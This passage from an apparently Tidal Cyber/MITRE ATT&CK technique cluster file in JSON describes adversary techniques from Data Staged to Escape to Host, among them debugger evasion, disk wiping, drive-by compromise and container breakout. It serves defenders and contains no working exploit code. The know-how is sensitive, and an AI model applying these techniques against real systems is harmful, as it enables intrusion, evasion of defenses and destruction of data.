"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "ef4ef020-5cd1-4859-902b-f207828a1281",
|
||
"value": "Data Staged"
|
||
},
|
||
{
|
||
"description": "An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "dc98c882-8fba-4a10-bc6f-43088edb87af",
|
||
"value": "Data Transfer Size Limits"
|
||
},
|
||
{
|
||
"description": "Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.<sup>[[ProcessHacker Github](https://app.tidalcyber.com/references/3fc82a92-cfba-405d-b30e-22eba69ab1ee)]</sup>\n\nDebugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8), if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads.\n\nSpecific checks will vary based on the target and/or adversary, but may involve [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).<sup>[[hasherezade debug](https://app.tidalcyber.com/references/53b0c71d-c577-40e8-8a04-9de083e276a2)]</sup><sup>[[AlKhaser Debug](https://app.tidalcyber.com/references/d9773aaf-e3ec-4ce3-b5c8-1ca3c4751622)]</sup><sup>[[vxunderground debug](https://app.tidalcyber.com/references/8c7fe2a2-64a1-4680-a4e6-f6eefe00407a)]</sup>\n\nAdversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) function calls such as <code>OutputDebugStringW()</code>.<sup>[[wardle evilquest partii](https://app.tidalcyber.com/references/4fee237c-c2ec-47f5-b382-ec6bd4779281)]</sup><sup>[[Checkpoint Dridex Jan 2021](https://app.tidalcyber.com/references/a988084f-1a58-4e5b-a616-ed31d311cccf)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "945c1564-6c13-4baa-b1d4-6ba82e06a897",
|
||
"value": "Debugger Evasion"
|
||
},
|
||
{
|
||
"description": "Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for [Defacement](https://app.tidalcyber.com/technique/9a21c7c7-cf8e-4f05-b196-86ec39653e3b) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://app.tidalcyber.com/technique/9a21c7c7-cf8e-4f05-b196-86ec39653e3b) in order to cause user discomfort, or to pressure compliance with accompanying messages. \n",
|
||
"meta": {
|
||
"platforms": [
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "9a21c7c7-cf8e-4f05-b196-86ec39653e3b",
|
||
"value": "Defacement"
|
||
},
|
||
{
|
||
"description": "Adversaries may use [Obfuscated Files or Information](https://app.tidalcyber.com/technique/046cc07e-8700-4536-9c5b-6ecb384f52b0) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\n\nOne such example is the use of [certutil](https://app.tidalcyber.com/software/2fe21578-ee31-4ee8-b6ab-b5f76f97d043) to decode a remote access tool portable executable file that has been hidden inside a certificate file.<sup>[[Malwarebytes Targeted Attack against Saudi Arabia](https://app.tidalcyber.com/references/735647f9-9cd4-4a20-8812-4671a3358e46)]</sup> Another example is using the Windows <code>copy /b</code> command to reassemble binary fragments into a malicious payload.<sup>[[Carbon Black Obfuscation Sept 2016](https://app.tidalcyber.com/references/bed8ae68-9738-46fb-abc9-0004fa35636a)]</sup>\n\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. <sup>[[Volexity PowerDuke November 2016](https://app.tidalcyber.com/references/4026c055-6020-41bb-a4c8-54b308867023)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "88c2fb46-877a-4005-8425-7639d0da1920",
|
||
"value": "Deobfuscate/Decode Files or Information"
|
||
},
|
||
{
|
||
"description": "Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://app.tidalcyber.com/technique/bebaf25b-9f50-4e3b-96cc-cc55c5765b61) and access other containers running on the node. <sup>[[AppSecco Kubernetes Namespace Breakout 2020](https://app.tidalcyber.com/references/85852b3e-f6a3-5406-9dd5-a649358a53de)]</sup>\n\nContainers can be deployed by various means, such as via Docker's <code>create</code> and <code>start</code> APIs or via a web application such as the Kubernetes dashboard or Kubeflow. <sup>[[Docker Containers API](https://app.tidalcyber.com/references/2351cb32-23d6-4557-9c52-e6e228402bab)]</sup><sup>[[Kubernetes Dashboard](https://app.tidalcyber.com/references/02f23351-df83-4aae-a0bd-614ed91bc683)]</sup><sup>[[Kubeflow Pipelines](https://app.tidalcyber.com/references/0b40474c-173c-4a8c-8cc7-bac2dcfcaedd)]</sup> In Kubernetes environments, containers may be deployed through workloads such as ReplicaSets or DaemonSets, which can allow containers to be deployed across multiple nodes.<sup>[[Kubernetes Workload Management](https://app.tidalcyber.com/references/f207163b-08a8-5219-aca8-812e83e0dad3)]</sup> Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.<sup>[[Aqua Build Images on Hosts](https://app.tidalcyber.com/references/efd64f41-13cc-4b2b-864c-4d2352cdadcd)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Containers"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "2618638c-f6bd-4840-a297-c45076e094a9",
|
||
"value": "Deploy Container"
|
||
},
|
||
{
|
||
"description": "Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.<sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup><sup>[[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)]</sup><sup>[[Bitdefender StrongPity June 2020](https://app.tidalcyber.com/references/7d2e20f2-20ba-4d51-9495-034c07be41a8)]</sup><sup>[[Talos Promethium June 2020](https://app.tidalcyber.com/references/188d990e-f0be-40f2-90f3-913dfe687d27)]</sup>\n\nAs with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.",
|
||
"meta": {
|
||
"platforms": [
|
||
"PRE"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "bf660248-2098-499b-b90c-8c47efb26c70",
|
||
"value": "Develop Capabilities"
|
||
},
|
||
{
|
||
"description": "Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://app.tidalcyber.com/technique/9e945aa5-3883-4537-a767-f49bdcce26c7)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c)).\n\nMany OS utilities may provide information about local device drivers, such as `driverquery.exe` and the `EnumDeviceDrivers()` API function on Windows.<sup>[[Microsoft Driverquery](https://app.tidalcyber.com/references/7302dc00-a75a-5787-a04c-88ef4922ac09)]</sup><sup>[[Microsoft EnumDeviceDrivers](https://app.tidalcyber.com/references/647ffc70-8eab-5f2f-abf4-9bbf42554043)]</sup> Information about device drivers (as well as associated services, i.e., [System Service Discovery](https://app.tidalcyber.com/technique/e0a347e2-2ac5-458b-ab0f-18d81b6d6055)) may also be available in the Registry.<sup>[[Microsoft Registry Drivers](https://app.tidalcyber.com/references/4bde767e-d4a7-56c5-9aa3-b3f3cc2e3e70)]</sup>\n\nOn Linux/macOS, device drivers (in the form of kernel modules) may be visible within `/dev` or using utilities such as `lsmod` and `modinfo`.<sup>[[Linux Kernel Programming](https://app.tidalcyber.com/references/70f31f19-e0b3-40b1-b8dd-6667557bb334)]</sup><sup>[[lsmod man](https://app.tidalcyber.com/references/c2f88274-9da4-5d24-b68d-302ee5990dd5)]</sup><sup>[[modinfo man](https://app.tidalcyber.com/references/d4f2db5c-ef6d-556d-a5e2-f6738277fecd)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "70ffc700-eb9b-54d7-8fd4-564bd71a6434",
|
||
"value": "Device Driver Discovery"
|
||
},
|
||
{
|
||
"description": "Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. <sup>[[Hakobyan 2009](https://app.tidalcyber.com/references/d92f6dc0-e902-4a4a-9083-8d1667a7003e)]</sup>\n\nUtilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.<sup>[[Github PowerSploit Ninjacopy](https://app.tidalcyber.com/references/e92aed6b-348b-4dab-8292-fee0698e4a85)]</sup> Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://app.tidalcyber.com/software/a7589733-6b04-4215-a4e7-4b62cd4610fa)) to create shadow copies or backups of data from system volumes.<sup>[[LOLBAS Esentutl](https://app.tidalcyber.com/references/691b4907-3544-4ad0-989c-b5c845e0330f)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "447f1d32-31f7-44b5-834a-dcba8b038e7f",
|
||
"value": "Direct Volume Access"
|
||
},
|
||
{
|
||
"description": "Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406), [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), and [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd).<sup>[[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)]</sup>\n\nOn network devices, adversaries may wipe configuration files and other data from the device using [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as `erase`.<sup>[[erase_cmd_cisco](https://app.tidalcyber.com/references/4c90eba9-118e-5d50-ad58-27bcb0e1e228)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "ea2b3980-05fd-41a3-8ab9-3106e833c821",
|
||
"value": "Disk Wipe"
|
||
},
|
||
{
|
||
"description": "Adversaries may modify the configuration settings of a domain or identity tenant to evade defenses and/or escalate privileges in centrally managed environments. Such services provide a centralized means of managing identity resources such as devices and accounts, and often include configuration settings that may apply between domains or tenants such as trust relationships, identity syncing, or identity federation.\n\nModifications to domain or tenant settings may include altering domain Group Policy Objects (GPOs) in Microsoft Active Directory (AD) or changing trust settings for domains, including federation trusts relationships between domains or tenants.\n\nWith sufficient permissions, adversaries can modify domain or tenant policy settings. Since configuration settings for these services apply to a large number of identity resources, there are a great number of potential attacks malicious outcomes that can stem from this abuse. Examples of such abuse include: \n\n* modifying GPOs to push a malicious [Scheduled Task](https://app.tidalcyber.com/technique/723c6d51-91db-4658-9ee0-eafb953c2d82) to computers throughout the domain environment<sup>[[ADSecurity GPO Persistence 2016](https://app.tidalcyber.com/references/e304715f-7da1-4342-ba5b-d0387d93aeb2)]</sup><sup>[[Wald0 Guide to GPOs](https://app.tidalcyber.com/references/48bb84ac-56c8-4840-9a11-2cc76213e24e)]</sup><sup>[[Harmj0y Abusing GPO Permissions](https://app.tidalcyber.com/references/18cc9426-9b51-46fa-9106-99688385ebe4)]</sup>\n* modifying domain trusts to include an adversary-controlled domain, allowing adversaries to forge access tokens that will subsequently be accepted by victim domain resources<sup>[[Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks](https://app.tidalcyber.com/references/47031992-841f-4ef4-87c6-bb4c077fb8dc)]</sup>\n* changing configuration settings within the AD environment to implement a [Rogue Domain Controller](https://app.tidalcyber.com/technique/c5eb5b88-6c62-4900-9b14-c4d67d420002).\n* adding new, adversary-controlled federated identity providers to identity tenants, allowing adversaries to authenticate as any user managed by the victim tenant <sup>[[Okta Cross-Tenant Impersonation 2023](https://app.tidalcyber.com/references/d54188b5-86eb-52a0-8384-823c45431762)]</sup>\n\nAdversaries may temporarily modify domain or tenant policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Azure AD",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "d092a9e1-63d0-415d-8cd0-666a261be5d9",
|
||
"value": "Domain or Tenant Policy Modification"
|
||
},
|
||
{
|
||
"description": "Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.<sup>[[Microsoft Trusts](https://app.tidalcyber.com/references/e6bfc6a8-9eea-4c65-9c2b-04749da72a92)]</sup> Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://app.tidalcyber.com/technique/dcb323f0-0fe6-4e26-9039-4f26f10cd3a5), [Pass the Ticket](https://app.tidalcyber.com/technique/5e771f38-6286-4330-b7b4-38071ad6b68a), and [Kerberoasting](https://app.tidalcyber.com/technique/2f980aed-b34a-4300-ac6b-70e7ddf6d9be).<sup>[[AdSecurity Forging Trust Tickets](https://app.tidalcyber.com/references/09d3ccc1-cd8a-4675-88c0-84110f5b8e8b)]</sup><sup>[[Harmj0y Domain Trusts](https://app.tidalcyber.com/references/23a9ef6c-9f71-47bb-929f-9a92f24553eb)]</sup> Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.<sup>[[Harmj0y Domain Trusts](https://app.tidalcyber.com/references/23a9ef6c-9f71-47bb-929f-9a92f24553eb)]</sup> The Windows utility [Nltest](https://app.tidalcyber.com/software/fbb1546a-f288-4e43-9e5c-14c94423c4f6) is known to be used by adversaries to enumerate domain trusts.<sup>[[Microsoft Operation Wilysupply](https://app.tidalcyber.com/references/567ce633-a061-460b-84af-01dfe3d818c7)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "93bd112e-9494-4b60-bdc5-8b610c7ebe21",
|
||
"value": "Domain Trust Discovery"
|
||
},
|
||
{
|
||
"description": "Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://app.tidalcyber.com/technique/8592f37d-850a-43d1-86f2-cc981ad7d7dc).\n\nMultiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://app.tidalcyber.com/technique/f2661f07-9027-4d19-9028-d07b7511f3d5)), including:\n\n* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting\n* Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary\n* Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://app.tidalcyber.com/technique/60ac24aa-ce63-5c1d-8126-db20a27d85be))\n* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).\n\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.<sup>[[Shadowserver Strategic Web Compromise](https://app.tidalcyber.com/references/cf531866-ac3c-4078-b847-5b4af7eb161f)]</sup>\n\nTypical drive-by compromise process:\n\n1. A user visits a website that is used to host the adversary controlled content.\n2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. \n * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.\n3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.\n * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.\n\nUnlike [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.\n\nAdversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://app.tidalcyber.com/technique/f78f2c87-626a-468f-93a5-31b61be17727)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.<sup>[[Volexity OceanLotus Nov 2017](https://app.tidalcyber.com/references/ed9f5545-377f-4a12-92e4-c0439cc5b037)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381",
|
||
"value": "Drive-by Compromise"
|
||
},
|
||
{
|
||
"description": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.\n\nAdversaries may use dynamic resolution for the purpose of [Fallback Channels](https://app.tidalcyber.com/technique/be8786b3-cd3d-47ef-a9e7-cd3ab3c901a1). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.<sup>[[Talos CCleanup 2017](https://app.tidalcyber.com/references/f2522cf4-dc65-4dc5-87e3-9e88212fcfe9)]</sup><sup>[[FireEye POSHSPY April 2017](https://app.tidalcyber.com/references/b1271e05-80d7-4761-a13f-b6f0db7d7e5a)]</sup><sup>[[ESET Sednit 2017 Activity](https://app.tidalcyber.com/references/406e434e-0602-4a08-bbf6-6d72311a720e)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "987ad3da-9423-4fe0-a52b-b931c0b8b95f",
|
||
"value": "Dynamic Resolution"
|
||
},
|
||
{
|
||
"description": "Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients. ",
|
||
"meta": {
|
||
"platforms": [
|
||
"Google Workspace",
|
||
"Linux",
|
||
"macOS",
|
||
"Office 365",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "3569b783-1be5-414b-adb9-42c47ceee1cc",
|
||
"value": "Email Collection"
|
||
},
|
||
{
|
||
"description": "Adversaries may employ an encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "0e704680-c930-42a7-9caa-5802b8cb2c48",
|
||
"value": "Encrypted Channel"
|
||
},
|
||
{
|
||
"description": "Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes<sup>[[FireEye OpPoisonedHandover February 2016](https://app.tidalcyber.com/references/1d57b1c8-930b-4bcb-a51e-39020327cc5d)]</sup> and to support other malicious activities, including distraction<sup>[[FSISAC FraudNetDoS September 2012](https://app.tidalcyber.com/references/9c8772eb-6d1d-4742-a2db-a5e1006effaa)]</sup>, hacktivism, and extortion.<sup>[[Symantec DDoS October 2014](https://app.tidalcyber.com/references/878e0382-4191-4bca-8adc-c379b0d57ba8)]</sup>\n\nAn Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\n\nTo perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nBotnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.<sup>[[USNYAG IranianBotnet March 2016](https://app.tidalcyber.com/references/69ee73c1-359f-4584-a6e7-75119d24bbf5)]</sup>\n\nIn cases where traffic manipulation is used, there may be points in the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.<sup>[[ArsTechnica Great Firewall of China](https://app.tidalcyber.com/references/1a08d58f-bf91-4345-aa4e-2906d3ef365a)]</sup>\n\nFor attacks attempting to saturate the providing network, see [Network Denial of Service](https://app.tidalcyber.com/technique/e6c14a7b-1fb8-4557-83e7-7f5b89717311).\n",
|
||
"meta": {
|
||
"platforms": [
|
||
"Azure AD",
|
||
"Containers",
|
||
"Google Workspace",
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "8b0caea0-602e-4117-8322-b125150f5c2a",
|
||
"value": "Endpoint Denial of Service"
|
||
},
|
||
{
|
||
"description": "Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.<sup>[[Docker Overview](https://app.tidalcyber.com/references/52954bb1-16b0-4717-a72c-8a6dec97610b)]</sup>\n\nThere are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets.<sup>[[Docker Bind Mounts](https://app.tidalcyber.com/references/b298b3d1-30c1-4894-b1de-be11812cde6b)]</sup><sup>[[Trend Micro Privileged Container](https://app.tidalcyber.com/references/92ac290c-4863-4774-b334-848ed72e3627)]</sup><sup>[[Intezer Doki July 20](https://app.tidalcyber.com/references/688b2582-6602-44e1-aaac-3a4b8e168b04)]</sup><sup>[[Container Escape](https://app.tidalcyber.com/references/8248917a-9afd-4ec6-a086-1a97a68deff1)]</sup><sup>[[Crowdstrike Kubernetes Container Escape](https://app.tidalcyber.com/references/84d5f015-9014-417c-b2a9-f650fe19d448)]</sup><sup>[[Keyctl-unmask](https://app.tidalcyber.com/references/75db8c88-e547-4d1b-8f22-6ace2b3d7ad4)]</sup>\n\nAdditionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://app.tidalcyber.com/technique/0b9609dd-9f19-4747-ba6e-421b6b7ff03f).<sup>[[Container Escape](https://app.tidalcyber.com/references/8248917a-9afd-4ec6-a086-1a97a68deff1)]</sup> Adversaries may also escape via [Exploitation for Privilege 